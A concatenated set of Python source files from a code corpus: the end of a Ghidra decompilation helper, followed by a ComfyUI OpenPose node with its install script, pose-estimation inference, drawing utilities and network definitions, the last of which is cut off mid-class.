self._construct_ghidra_headless_command(path_to_binary, script_path, binary_hash)
def get_list_of_reachable_functions(self, path_to_binary, function_name):
binary_hash = self._hash_binary(path_to_binary)
with tempfile.TemporaryDirectory() as tmpdirname:
script_path = Path(tmpdirname, "script.py").resolve()
script_contents = self.generate_control_flow_script(function_name)
with open(script_path, "w") as file:
file.write(script_contents)
extracted_text = self._extract_text_between_delimiters(str(self._construct_ghidra_headless_command(path_to_binary, script_path, binary_hash)))
list_of_functions = extracted_text[0].replace("\\n", "").strip("\\").strip(function_name).strip().split(" ")
return list_of_functions
def _extract_text_between_delimiters(self, text):
# Define the regular expression pattern to match text between ***
pattern = r'\*\*\*(.*?)\*\*\*'
# Use re.findall to find all matches in the text
matches = re.findall(pattern, text, re.DOTALL)
return matches
def decompile_all_binaries_in_folder(self, path_to_folder, decom_folder):
# Create a list to store all the file paths
files_to_process = [file_path for file_path in Path(path_to_folder).iterdir() if file_path.is_file()]
# Use a ProcessPoolExecutor to execute the decompilation in parallel
with ProcessPoolExecutor() as executor:
# Create a list of futures
futures = [executor.submit(self.decompile_binaries_functions, file_path, decom_folder) for file_path in
files_to_process]
# Use tqdm to show progress
for _ in tqdm(concurrent.futures.as_completed(futures), total=len(files_to_process),
desc="Decompiling functions in binaries from {}".format(path_to_folder)):
pass
if __name__ == '__main__':
raise Exception("This is not a program entrypoint!")
| 26,567 | Python | .py | 598 | 35.769231 | 154 | 0.641777 | user1342/GhidraBridge | 8 | 5 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,110 | openpose_node.py | alessandrozonta_ComfyUI-OpenPose/openpose_node.py | import os
import torch
import cv2
import numpy as np
from .src import torch_openpose, util
from huggingface_hub import snapshot_download
from torchvision import transforms
# Define a transform to convert the image to a tensor
transform = transforms.ToTensor()
# find folder with models
def find_folder_upwards(start_dir, target_folder):
"""
Search for a target folder starting from a specified directory and moving upwards through the directory tree.
This function starts from the `start_dir` directory and searches for the `target_folder` in the current directory.
If it does not find the `target_folder`, it moves up one level in the directory hierarchy and repeats the process.
This continues until the `target_folder` is found or the root directory is reached.
Parameters:
start_dir (str): The directory to start the search from.
target_folder (str): The name of the folder to search for.
Returns:
str: The path to the target folder if found. None if the folder is not found.
Example:
>>> find_folder_upwards('/home/user/projects/my_project', 'models')
'/home/user/models'
>>> find_folder_upwards('/home/user/projects/my_project', 'non_existent_folder')
None
Note:
- This function assumes that `start_dir` is a valid directory path.
- If `start_dir` is already the root directory, the function will immediately return None if `target_folder` is not found in it.
"""
current_dir = start_dir
while True:
# Check if the target folder exists in the current directory
if target_folder in os.listdir(current_dir):
target_path = os.path.join(current_dir, target_folder)
if os.path.isdir(target_path):
return target_path
# Move up one level in the directory tree
parent_dir = os.path.dirname(current_dir)
if current_dir == parent_dir: # If current directory is root
return None
current_dir = parent_dir
def download_openpose_model_from_huggingface(model_name, output_directory):
"""Downloads an OpenPose model from the specified repository on Hugging Face Hub to the output directory.
Args:
model_name (str): The name of the model to download (e.g., "openpose_body_25").
output_directory (str, optional): The directory to save the downloaded model files. Defaults to "../../models/openpose".
Returns:
str: The path to the downloaded model directory or `None` if an error occurs.
"""
if not os.path.exists(output_directory):
os.makedirs(output_directory, exist_ok=True) # Create the output directory if it doesn't exist
# Downloading the model file from the specified URL using snapshot_download
repo_id = "alezonta/openpose"
# Check if the file exists
print("checking existence file")
file_exists = os.path.isfile(f"{output_directory}/{model_name}")
if not file_exists:
print("downloading model")
# The snapshot_download function is used to download the entire repository
# or specific files from it. In this case, we specify the repo_id and download the specific file.
snapshot_download(repo_id=repo_id, allow_patterns=model_name, local_dir=output_directory)
else:
print("model alredy downloaded")
class OpenPoseNode:
def __init__(self):
self.model_path = None # Initialize to None
self.model = None
@classmethod
def INPUT_TYPES(s):
return {
"required": {
"input_image": ("IMAGE",),
"typology": (["COCO", "BODY_25"],),
"transparency": ("FLOAT", {"default": 0.4, "min": 0, "max": 1, "step": 0.1}),
}
}
RETURN_TYPES = ("IMAGE", "IMAGE", "POSE_KEYPOINT")
RETURN_NAMES = ("image with keypoints", "keypoints only", "keypoints")
FUNCTION = "main"
CATEGORY = "OpenPose"
def main(self, input_image, typology, transparency):
# Check for valid typology
if typology not in ["COCO", "BODY_25"]:
raise ValueError(f"Invalid typology: {typology}")
model_name = "body_25.pth" if typology == "BODY_25" else "body_coco.pth"
# find path
model_path = find_folder_upwards(start_dir=os.getcwd(), target_folder="models")
self.model_path = f"{model_path}/openpose/{model_name}"
# load model
download_openpose_model_from_huggingface(model_name=model_name, output_directory=f"{model_path}/openpose/")
# Check if the input is a batch by looking at its first dimension
if len(input_image.shape) > 3 or input_image.shape[0] > 1:
# If it's a batch, take the first image
image = input_image[0]
else:
# If it's a single image, keep it as is
image = input_image
# remove the batch
image = image.squeeze(0)
# check if alfa channel is present, if not add it to the original image
if image.shape[2] != 4: # Check if image already has 4 channels (RGBA)
# Create an alpha channel with full opacity
alpha_channel = torch.ones(image.shape[0], image.shape[1], 1)
# Concatenate channels to create RGBA image
image = torch.cat((image, alpha_channel), dim=2)
# Load the selected model
self.model = torch_openpose.torch_openpose(typology.lower(), self.model_path) # Replace with actual path
# Normalize the float32 tensor to the range [0, 1]
float_tensor_normalized = (image - image.min()) / (image.max() - image.min())
# Scale the normalized tensor to the range [0, 255] and convert to torch.uint8
image = (float_tensor_normalized * 255).to(torch.uint8)
max_size = 1024
# Convert the tensor to a numpy array
numpy_image = image.cpu().numpy()
# Convert the numpy array to a cv2 image
cv2_image = cv2.cvtColor(numpy_image, cv2.COLOR_BGR2RGB)
# Get the dimensions of the image
height, width = cv2_image.shape[:2]
# Resize if necessary
if max(cv2_image.shape[:2]) > max_size:
# Determine the scaling factor
if height > width:
scaling_factor = 1024.0 / height
else:
scaling_factor = 1024.0 / width
# Resize the image
new_dimensions = (int(width * scaling_factor), int(height * scaling_factor))
resized_image = cv2.resize(cv2_image, new_dimensions, interpolation=cv2.INTER_AREA)
else:
resized_image = cv2_image
# Get keypoints using the loaded model
poses = self.model(resized_image)
# Draw keypoints
drawn_image = util.draw_bodypose(resized_image, poses, typology.lower(), transparency=transparency)
drawn_image = drawn_image.astype(np.float32) / 255
# only keypoints image
black_image = np.zeros_like(resized_image)
only_keypoints = util.draw_bodypose(black_image, poses, typology.lower())
only_keypoints = only_keypoints.astype(np.float32) / 255
# Resize back if necessary
if max(image.shape[:2]) > max_size:
drawn_image = cv2.resize(drawn_image, (cv2_image.shape[1], cv2_image.shape[0]), interpolation=cv2.INTER_AREA)
only_keypoints = cv2.resize(only_keypoints, (cv2_image.shape[1], cv2_image.shape[0]), interpolation=cv2.INTER_AREA)
# Apply the transform to the image
drawn_image = cv2.cvtColor(drawn_image, cv2.COLOR_RGB2BGR)
only_keypoints = cv2.cvtColor(only_keypoints, cv2.COLOR_RGB2BGR)
drawn_image = np.transpose(drawn_image, (1, 2, 0))
only_keypoints = np.transpose(only_keypoints, (1, 2, 0))
image_tensor = transform(drawn_image).unsqueeze(0)
only_keypoints = transform(only_keypoints).unsqueeze(0)
# Collect poses in the specified format
pose_data = {
'people': [{'pose_keypoints_2d': poses}],
'canvas_height': image_tensor.shape[1],
'canvas_width': image_tensor.shape[2]
}
# Convert back to torch image and return
return (image_tensor, only_keypoints, pose_data)
NODE_CLASS_MAPPINGS = {
"OpenPose - Get poses": OpenPoseNode
}
NODE_DISPLAY_NAME_MAPPINGS = {
"OpenPoseNode": "OpenPose - Get poses"
}
| 8,514 | Python | .py | 165 | 42.424242 | 132 | 0.655704 | alessandrozonta/ComfyUI-OpenPose | 8 | 1 | 2 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,111 | install.py | alessandrozonta_ComfyUI-OpenPose/install.py | import subprocess
import sys
def install(package):
subprocess.check_call([sys.executable, "-m", "pip", "install", package])
packages = [
"torch",
"opencv-python",
"numpy",
"huggingface_hub",
"torchvision"
]
for package in packages:
install(package)
print("All packages installed successfully.")
| 327 | Python | .py | 14 | 20.071429 | 76 | 0.705502 | alessandrozonta/ComfyUI-OpenPose | 8 | 1 | 2 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,112 | torch_openpose.py | alessandrozonta_ComfyUI-OpenPose/src/torch_openpose.py | import cv2
import numpy as np
import math
from scipy.ndimage.filters import gaussian_filter
import torch
from .util import padRightDownCorner
from .model import bodypose_model,bodypose_25_model
class torch_openpose(object):
def __init__(self, model_type, path_model):
if model_type == 'body_25':
self.model = bodypose_25_model()
self.njoint = 26
self.npaf = 52
self.model.load_state_dict(torch.load(path_model))
else:
self.model = bodypose_model()
self.njoint = 19
self.npaf = 38
self.model.load_state_dict(torch.load(path_model))
if torch.cuda.is_available():
self.model = self.model.cuda()
self.model.eval()
if self.njoint == 19: #coco
self.limbSeq = [[1, 2], [1, 5], [2, 3], [3, 4], [5, 6], [6, 7], [1, 8], [8, 9], \
[9, 10], [1, 11], [11, 12], [12, 13], [1, 0], [0, 14], [14, 16], \
[0, 15], [15, 17]]
self.mapIdx = [[12, 13],[20, 21],[14, 15],[16, 17],[22, 23],[24, 25],[0, 1],[2, 3],\
[4, 5],[6, 7],[8, 9],[10, 11],[28, 29],[30, 31],[34, 35],[32, 33],\
[36, 37]]
elif self.njoint == 26: #body_25
self.limbSeq = [[1,0],[1,2],[2,3],[3,4],[1,5],[5,6],[6,7],[1,8],[8,9],[9,10],\
[10,11],[8,12],[12,13],[13,14],[0,15],[0,16],[15,17],[16,18],\
[11,24],[11,22],[14,21],[14,19],[22,23],[19,20]]
self.mapIdx = [[30, 31],[14, 15],[16, 17],[18, 19],[22, 23],[24, 25],[26, 27],[0, 1],[6, 7],\
[2, 3],[4, 5], [8, 9],[10, 11],[12, 13],[32, 33],[34, 35],[36,37],[38,39],\
[50,51],[46,47],[44,45],[40,41],[48,49],[42,43]]
def __call__(self, oriImg):
# scale_search = [0.5, 1.0, 1.5, 2.0]
scale_search = [0.5]
boxsize = 368
stride = 8
padValue = 128
thre1 = 0.1
thre2 = 0.05
multiplier = [x * boxsize / oriImg.shape[0] for x in scale_search]
heatmap_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], self.njoint))
paf_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], self.npaf))
for m in range(len(multiplier)):
scale = multiplier[m]
imageToTest = cv2.resize(oriImg, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
imageToTest_padded, pad = padRightDownCorner(imageToTest, stride, padValue)
im = np.transpose(np.float32(imageToTest_padded[:, :, :, np.newaxis]), (3, 2, 0, 1)) / 256 - 0.5
im = np.ascontiguousarray(im)
data = torch.from_numpy(im).float()
if torch.cuda.is_available():
data = data.cuda()
# data = data.permute([2, 0, 1]).unsqueeze(0).float()
with torch.no_grad():
heatmap, paf = self.model(data)
heatmap = heatmap.detach().cpu().numpy()
paf = paf.detach().cpu().numpy()
# extract outputs, resize, and remove padding
# heatmap = np.transpose(np.squeeze(net.blobs[output_blobs.keys()[1]].data), (1, 2, 0)) # output 1 is heatmaps
heatmap = np.transpose(np.squeeze(heatmap), (1, 2, 0)) # output 1 is heatmaps
heatmap = cv2.resize(heatmap, (0, 0), fx=stride, fy=stride, interpolation=cv2.INTER_CUBIC)
heatmap = heatmap[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :]
heatmap = cv2.resize(heatmap, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC)
# paf = np.transpose(np.squeeze(net.blobs[output_blobs.keys()[0]].data), (1, 2, 0)) # output 0 is PAFs
paf = np.transpose(np.squeeze(paf), (1, 2, 0)) # output 0 is PAFs
paf = cv2.resize(paf, (0, 0), fx=stride, fy=stride, interpolation=cv2.INTER_CUBIC)
paf = paf[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :]
paf = cv2.resize(paf, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC)
heatmap_avg += heatmap_avg + heatmap / len(multiplier)
paf_avg += + paf / len(multiplier)
all_peaks = []
peak_counter = 0
for part in range(self.njoint - 1):
map_ori = heatmap_avg[:, :, part]
one_heatmap = gaussian_filter(map_ori, sigma=3)
map_left = np.zeros(one_heatmap.shape)
map_left[1:, :] = one_heatmap[:-1, :]
map_right = np.zeros(one_heatmap.shape)
map_right[:-1, :] = one_heatmap[1:, :]
map_up = np.zeros(one_heatmap.shape)
map_up[:, 1:] = one_heatmap[:, :-1]
map_down = np.zeros(one_heatmap.shape)
map_down[:, :-1] = one_heatmap[:, 1:]
peaks_binary = np.logical_and.reduce(
(one_heatmap >= map_left, one_heatmap >= map_right, one_heatmap >= map_up, one_heatmap >= map_down, one_heatmap > thre1))
peaks = list(zip(np.nonzero(peaks_binary)[1], np.nonzero(peaks_binary)[0])) # note reverse
peaks_with_score = [x + (map_ori[x[1], x[0]],) for x in peaks]
peak_id = range(peak_counter, peak_counter + len(peaks))
peaks_with_score_and_id = [peaks_with_score[i] + (peak_id[i],) for i in range(len(peak_id))]
all_peaks.append(peaks_with_score_and_id)
peak_counter += len(peaks)
# find connection in the specified sequence, center 29 is in the position 15
limbSeq = self.limbSeq
# the middle joints heatmap correpondence
mapIdx = self.mapIdx
connection_all = []
special_k = []
mid_num = 10
for k in range(len(mapIdx)):
score_mid = paf_avg[:, :, mapIdx[k]]
candA = all_peaks[limbSeq[k][0]]
candB = all_peaks[limbSeq[k][1]]
nA = len(candA)
nB = len(candB)
indexA, indexB = limbSeq[k]
if (nA != 0 and nB != 0):
connection_candidate = []
for i in range(nA):
for j in range(nB):
vec = np.subtract(candB[j][:2], candA[i][:2])
norm = math.sqrt(vec[0] * vec[0] + vec[1] * vec[1])
vec = np.divide(vec, norm)
startend = list(zip(np.linspace(candA[i][0], candB[j][0], num=mid_num), \
np.linspace(candA[i][1], candB[j][1], num=mid_num)))
vec_x = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 0] \
for I in range(len(startend))])
vec_y = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 1] \
for I in range(len(startend))])
score_midpts = np.multiply(vec_x, vec[0]) + np.multiply(vec_y, vec[1])
score_with_dist_prior = sum(score_midpts) / len(score_midpts) + min(
0.5 * oriImg.shape[0] / norm - 1, 0)
criterion1 = len(np.nonzero(score_midpts > thre2)[0]) > 0.8 * len(score_midpts)
criterion2 = score_with_dist_prior > 0
if criterion1 and criterion2:
connection_candidate.append(
[i, j, score_with_dist_prior, score_with_dist_prior + candA[i][2] + candB[j][2]])
connection_candidate = sorted(connection_candidate, key=lambda x: x[2], reverse=True)
connection = np.zeros((0, 5))
for c in range(len(connection_candidate)):
i, j, s = connection_candidate[c][0:3]
if (i not in connection[:, 3] and j not in connection[:, 4]):
connection = np.vstack([connection, [candA[i][3], candB[j][3], s, i, j]])
if (len(connection) >= min(nA, nB)):
break
connection_all.append(connection)
else:
special_k.append(k)
connection_all.append([])
# last number in each row is the total parts number of that person
# the second last number in each row is the score of the overall configuration
subset = -1 * np.ones((0, self.njoint + 1))
candidate = np.array([item for sublist in all_peaks for item in sublist])
for k in range(len(mapIdx)):
if k not in special_k:
partAs = connection_all[k][:, 0]
partBs = connection_all[k][:, 1]
indexA, indexB = np.array(limbSeq[k])
for i in range(len(connection_all[k])): # = 1:size(temp,1)
found = 0
subset_idx = [-1, -1]
for j in range(len(subset)): # 1:size(subset,1):
if subset[j][indexA] == partAs[i] or subset[j][indexB] == partBs[i]:
subset_idx[found] = j
found += 1
if found == 1:
j = subset_idx[0]
if subset[j][indexB] != partBs[i]:
subset[j][indexB] = partBs[i]
subset[j][-1] += 1
subset[j][-2] += candidate[partBs[i].astype(int), 2] + connection_all[k][i][2]
elif found == 2: # if found 2 and disjoint, merge them
j1, j2 = subset_idx
membership = ((subset[j1] >= 0).astype(int) + (subset[j2] >= 0).astype(int))[:-2]
if len(np.nonzero(membership == 2)[0]) == 0: # merge
subset[j1][:-2] += (subset[j2][:-2] + 1)
subset[j1][-2:] += subset[j2][-2:]
subset[j1][-2] += connection_all[k][i][2]
subset = np.delete(subset, j2, 0)
else: # as like found == 1
subset[j1][indexB] = partBs[i]
subset[j1][-1] += 1
subset[j1][-2] += candidate[partBs[i].astype(int), 2] + connection_all[k][i][2]
# if find no partA in the subset, create a new subset
elif not found:
row = -1 * np.ones(self.njoint + 1)
row[indexA] = partAs[i]
row[indexB] = partBs[i]
row[-1] = 2
row[-2] = sum(candidate[connection_all[k][i, :2].astype(int), 2]) + connection_all[k][i][2]
subset = np.vstack([subset, row])
# delete some rows of subset which has few parts occur
deleteIdx = []
for i in range(len(subset)):
if subset[i][-1] < 4 or subset[i][-2] / subset[i][-1] < 0.4:
deleteIdx.append(i)
subset = np.delete(subset, deleteIdx, axis=0)
poses = []
for per in subset:
pose = []
for po in per[:-2]:
if po >= 0:
joint = list(candidate[int(po)][:3])
else:
joint = [0.,0.,0.]
pose.append(joint)
poses.append(pose)
return poses
| 11,585 | Python | .py | 201 | 40.800995 | 137 | 0.485082 | alessandrozonta/ComfyUI-OpenPose | 8 | 1 | 2 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,113 | util.py | alessandrozonta_ComfyUI-OpenPose/src/util.py | import numpy as np
import math
import cv2
# draw the body keypoint and lims
def draw_bodypose(img, poses,model_type = 'coco', transparency=0.4):
stickwidth = 4
limbSeq = [[1, 2], [1, 5], [2, 3], [3, 4], [5, 6], [6, 7], [1, 8], [8, 9], \
[9, 10], [1, 11], [11, 12], [12, 13], [1, 0], [0, 14], [14, 16], \
[0, 15], [15, 17]]
njoint = 18
if model_type == 'body_25':
limbSeq = [[1,0],[1,2],[2,3],[3,4],[1,5],[5,6],[6,7],[1,8],[8,9],[9,10],\
[10,11],[8,12],[12,13],[13,14],[0,15],[0,16],[15,17],[16,18],\
[11,24],[11,22],[14,21],[14,19],[22,23],[19,20]]
njoint = 25
colors = [[255, 0, 0], [255, 85, 0], [255, 170, 0], [255, 255, 0], [170, 255, 0], [85, 255, 0], [0, 255, 0], \
[0, 255, 85], [0, 255, 170], [0, 255, 255], [0, 170, 255], [0, 85, 255], [0, 0, 255], [85, 0, 255], \
[170, 0, 255], [255, 0, 255], [255, 0, 170], [255, 0, 85], [255,255,0], [255,255,85], [255,255,170],\
[255,255,255],[170,255,255],[85,255,255],[0,255,255]]
for i in range(njoint):
for n in range(len(poses)):
pose = poses[n][i]
if pose[2] <= 0:
continue
x, y = pose[:2]
cv2.circle(img, (int(x), int(y)), 4, colors[i], thickness=-1)
for pose in poses:
for limb,color in zip(limbSeq,colors):
p1 = pose[limb[0]]
p2 = pose[limb[1]]
if p1[2] <=0 or p2[2] <= 0:
continue
cur_canvas = img.copy()
X = [p1[1],p2[1]]
Y = [p1[0],p2[0]]
mX = np.mean(X)
mY = np.mean(Y)
length = ((X[0] - X[1]) ** 2 + (Y[0] - Y[1]) ** 2) ** 0.5
angle = math.degrees(math.atan2(X[0] - X[1], Y[0] - Y[1]))
polygon = cv2.ellipse2Poly((int(mY), int(mX)), (int(length / 2), stickwidth), int(angle), 0, 360, 1)
cv2.fillConvexPoly(cur_canvas, polygon, color)
img = cv2.addWeighted(img, transparency, cur_canvas, 1 - transparency, 0)
return img
def padRightDownCorner(img, stride, padValue):
h = img.shape[0]
w = img.shape[1]
pad = 4 * [None]
pad[0] = 0 # up
pad[1] = 0 # left
pad[2] = 0 if (h % stride == 0) else stride - (h % stride) # down
pad[3] = 0 if (w % stride == 0) else stride - (w % stride) # right
img_padded = img
pad_up = np.tile(img_padded[0:1, :, :]*0 + padValue, (pad[0], 1, 1))
img_padded = np.concatenate((pad_up, img_padded), axis=0)
pad_left = np.tile(img_padded[:, 0:1, :]*0 + padValue, (1, pad[1], 1))
img_padded = np.concatenate((pad_left, img_padded), axis=1)
pad_down = np.tile(img_padded[-2:-1, :, :]*0 + padValue, (pad[2], 1, 1))
img_padded = np.concatenate((img_padded, pad_down), axis=0)
pad_right = np.tile(img_padded[:, -2:-1, :]*0 + padValue, (1, pad[3], 1))
img_padded = np.concatenate((img_padded, pad_right), axis=1)
return img_padded, pad
| 3,048 | Python | .py | 61 | 40.163934 | 115 | 0.484154 | alessandrozonta/ComfyUI-OpenPose | 8 | 1 | 2 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,114 | breakout25.py | alessandrozonta_ComfyUI-OpenPose/src/breakout25.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 28 15:13:51 2020
@author: joe
"""
import numpy as np
import math
jointpairs = [[1,0],[1,2],[2,3],[3,4],[1,5],[5,6],[6,7],[1,8],[8,9],[9,10],[10,11],[8,12],[12,13],[13,14],[0,15],[0,16]\
,[15,17],[16,18],[11,24],[11,22],[14,21],[14,19],[22,23],[19,20]]
#[[1,0], [1,2], [2,3], [3,4], [1,5], [5,6], [6,7], [1,8], [8,9], [9,10],[10,11], [8,12],[12,13], [13,14], [0,15], [0,16]]
#[[30, 31],[14, 15],[16, 17],[18, 19],[22, 23],[24, 25],[26, 27],[0, 1],[6, 7],[2, 3],[4, 5], [8, 9],[10, 11],[12, 13],[32, 33],[34, 35]]
#[[15,17],[16,18],[11,24],[11,22],[14,21],[14,19],[22,23],[19,20]]
#[[36,37],[38,39],[50,51],[46,47],[44,45],[40,41],[48,49],[42,43]]
map25 = [[i,i+1] for i in range(0,52,2)]
def findoutmappair(all_peaks,paf):
mid_num = 10
pairmap = []
for pair in jointpairs:
candA = all_peaks[pair[0]]
candB = all_peaks[pair[1]]
if len(candA) == 0 or len(candB) == 0:
pairmap.append([])
continue
candA = candA[0]
candB = candB[0]
startend = list(zip(np.linspace(candA[0], candB[0], num=mid_num), \
np.linspace(candA[1], candB[1], num=mid_num)))
vec = np.subtract(candB[:2], candA[:2])
norm = math.sqrt(vec[0] * vec[0] + vec[1] * vec[1])
vec = np.divide(vec, norm)
score = 0.
tmp = []
for mp in map25:
score_mid = paf[:,:,[mp[0],mp[1]]]
vec_x = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 0] \
for I in range(len(startend))])
vec_y = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 1] \
for I in range(len(startend))])
score_midpts = np.multiply(vec_x, vec[0]) + np.multiply(vec_y, vec[1])
score_midpts = score_midpts.sum()
if score < score_midpts:
score = score_midpts
tmp = mp
if score > 0.5:
pairmap.append(tmp+[score,])
else:
pairmap.append([])
return pairmap
| 2,251 | Python | .py | 49 | 35.857143 | 138 | 0.472694 | alessandrozonta/ComfyUI-OpenPose | 8 | 1 | 2 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,115 | model.py | alessandrozonta_ComfyUI-OpenPose/src/model.py | import torch
from collections import OrderedDict
import torch
import torch.nn as nn
def make_layers(block, no_relu_layers,prelu_layers = []):
layers = []
for layer_name, v in block.items():
if 'pool' in layer_name:
layer = nn.MaxPool2d(kernel_size=v[0], stride=v[1],
padding=v[2])
layers.append((layer_name, layer))
else:
conv2d = nn.Conv2d(in_channels=v[0], out_channels=v[1],
kernel_size=v[2], stride=v[3],
padding=v[4])
layers.append((layer_name, conv2d))
if layer_name not in no_relu_layers:
if layer_name not in prelu_layers:
layers.append(('relu_'+layer_name, nn.ReLU(inplace=True)))
else:
layers.append(('prelu'+layer_name[4:],nn.PReLU(v[1])))
return nn.Sequential(OrderedDict(layers))
def make_layers_Mconv(block,no_relu_layers):
modules = []
for layer_name, v in block.items():
layers = []
if 'pool' in layer_name:
layer = nn.MaxPool2d(kernel_size=v[0], stride=v[1],
padding=v[2])
layers.append((layer_name, layer))
else:
conv2d = nn.Conv2d(in_channels=v[0], out_channels=v[1],
kernel_size=v[2], stride=v[3],
padding=v[4])
layers.append((layer_name, conv2d))
if layer_name not in no_relu_layers:
layers.append(('Mprelu'+layer_name[5:], nn.PReLU(v[1])))
modules.append(nn.Sequential(OrderedDict(layers)))
return nn.ModuleList(modules)
class bodypose_25_model(nn.Module):
def __init__(self):
super(bodypose_25_model,self).__init__()
# these layers have no relu layer
no_relu_layers = ['Mconv7_stage0_L1','Mconv7_stage0_L2',\
'Mconv7_stage1_L1', 'Mconv7_stage1_L2',\
'Mconv7_stage2_L2', 'Mconv7_stage3_L2']
prelu_layers = ['conv4_2','conv4_3_CPM','conv4_4_CPM']
blocks = {}
block0 = OrderedDict([
('conv1_1', [3, 64, 3, 1, 1]),
('conv1_2', [64, 64, 3, 1, 1]),
('pool1_stage1', [2, 2, 0]),
('conv2_1', [64, 128, 3, 1, 1]),
('conv2_2', [128, 128, 3, 1, 1]),
('pool2_stage1', [2, 2, 0]),
('conv3_1', [128, 256, 3, 1, 1]),
('conv3_2', [256, 256, 3, 1, 1]),
('conv3_3', [256, 256, 3, 1, 1]),
('conv3_4', [256, 256, 3, 1, 1]),
('pool3_stage1', [2, 2, 0]),
('conv4_1', [256, 512, 3, 1, 1]),
('conv4_2', [512, 512, 3, 1, 1]),
('conv4_3_CPM', [512, 256, 3, 1, 1]),
('conv4_4_CPM', [256, 128, 3, 1, 1])
])
self.model0 = make_layers(block0, no_relu_layers,prelu_layers)
#L2
#stage0
blocks['Mconv1_stage0_L2'] = OrderedDict([
('Mconv1_stage0_L2_0',[128,96,3,1,1]),
('Mconv1_stage0_L2_1',[96,96,3,1,1]),
('Mconv1_stage0_L2_2',[96,96,3,1,1])
])
for i in range(2,6):
blocks['Mconv%d_stage0_L2' % i] = OrderedDict([
('Mconv%d_stage0_L2_0' % i,[288,96,3,1,1]),
('Mconv%d_stage0_L2_1' % i,[96,96,3,1,1]),
('Mconv%d_stage0_L2_2' % i,[96,96,3,1,1])
])
blocks['Mconv6_7_stage0_L2'] = OrderedDict([
('Mconv6_stage0_L2',[288, 256, 1,1,0]),
('Mconv7_stage0_L2',[256,52,1,1,0])
])
#stage1~3
for s in range(1,4):
blocks['Mconv1_stage%d_L2' % s] = OrderedDict([
('Mconv1_stage%d_L2_0' % s,[180,128,3,1,1]),
('Mconv1_stage%d_L2_1' % s,[128,128,3,1,1]),
('Mconv1_stage%d_L2_2' % s,[128,128,3,1,1])
])
for i in range(2,6):
blocks['Mconv%d_stage%d_L2' % (i,s)] = OrderedDict([
('Mconv%d_stage%d_L2_0' % (i,s) ,[384,128,3,1,1]),
('Mconv%d_stage%d_L2_1' % (i,s) ,[128,128,3,1,1]),
('Mconv%d_stage%d_L2_2' % (i,s) ,[128,128,3,1,1])
])
blocks['Mconv6_7_stage%d_L2' % s] = OrderedDict([
('Mconv6_stage%d_L2' % s,[384,512,1,1,0]),
('Mconv7_stage%d_L2' % s,[512,52,1,1,0])
])
#L1
#stage0
blocks['Mconv1_stage0_L1'] = OrderedDict([
('Mconv1_stage0_L1_0',[180,96,3,1,1]),
('Mconv1_stage0_L1_1',[96,96,3,1,1]),
('Mconv1_stage0_L1_2',[96,96,3,1,1])
])
for i in range(2,6):
blocks['Mconv%d_stage0_L1' % i] = OrderedDict([
('Mconv%d_stage0_L1_0' % i,[288,96,3,1,1]),
('Mconv%d_stage0_L1_1' % i,[96,96,3,1,1]),
('Mconv%d_stage0_L1_2' % i,[96,96,3,1,1])
])
blocks['Mconv6_7_stage0_L1'] = OrderedDict([
('Mconv6_stage0_L1',[288, 256, 1,1,0]),
('Mconv7_stage0_L1',[256,26,1,1,0])
])
#stage1
blocks['Mconv1_stage1_L1'] = OrderedDict([
('Mconv1_stage1_L1_0',[206,128,3,1,1]),
('Mconv1_stage1_L1_1',[128,128,3,1,1]),
('Mconv1_stage1_L1_2',[128,128,3,1,1])
])
for i in range(2,6):
blocks['Mconv%d_stage1_L1' % i] = OrderedDict([
('Mconv%d_stage1_L1_0' % i,[384,128,3,1,1]),
('Mconv%d_stage1_L1_1' % i,[128,128,3,1,1]),
('Mconv%d_stage1_L1_2' % i,[128,128,3,1,1])
])
blocks['Mconv6_7_stage1_L1'] = OrderedDict([
('Mconv6_stage1_L1',[384,512,1,1,0]),
('Mconv7_stage1_L1',[512,26,1,1,0])
])
for k in blocks.keys():
blocks[k] = make_layers_Mconv(blocks[k], no_relu_layers)
self.models = nn.ModuleDict(blocks)
#self.model_L2_S0_mconv1 = blocks['Mconv1_stage0_L2']
def _Mconv_forward(self,x,models):
outs = []
out = x
for m in models:
out = m(out)
outs.append(out)
return torch.cat(outs,1)
def forward(self,x):
out0 = self.model0(x)
#L2
tout = out0
for s in range(4):
tout = self._Mconv_forward(tout,self.models['Mconv1_stage%d_L2' % s])
for v in range(2,6):
tout = self._Mconv_forward(tout,self.models['Mconv%d_stage%d_L2' % (v,s)])
tout = self.models['Mconv6_7_stage%d_L2' % s][0](tout)
tout = self.models['Mconv6_7_stage%d_L2' % s][1](tout)
outL2 = tout
tout = torch.cat([out0,tout],1)
#L1 stage0
#tout = torch.cat([out0,outL2],1)
tout = self._Mconv_forward(tout, self.models['Mconv1_stage0_L1'])
for v in range(2,6):
tout = self._Mconv_forward(tout, self.models['Mconv%d_stage0_L1' % v])
tout = self.models['Mconv6_7_stage0_L1'][0](tout)
tout = self.models['Mconv6_7_stage0_L1'][1](tout)
outS0L1 = tout
tout = torch.cat([out0,outS0L1,outL2],1)
#L1 stage1
tout = self._Mconv_forward(tout, self.models['Mconv1_stage1_L1'])
for v in range(2,6):
tout = self._Mconv_forward(tout, self.models['Mconv%d_stage1_L1' % v])
tout = self.models['Mconv6_7_stage1_L1'][0](tout)
outS1L1 = self.models['Mconv6_7_stage1_L1'][1](tout)
return outS1L1,outL2
class bodypose_model(nn.Module):
def __init__(self):
super(bodypose_model, self).__init__()
# these layers have no relu layer
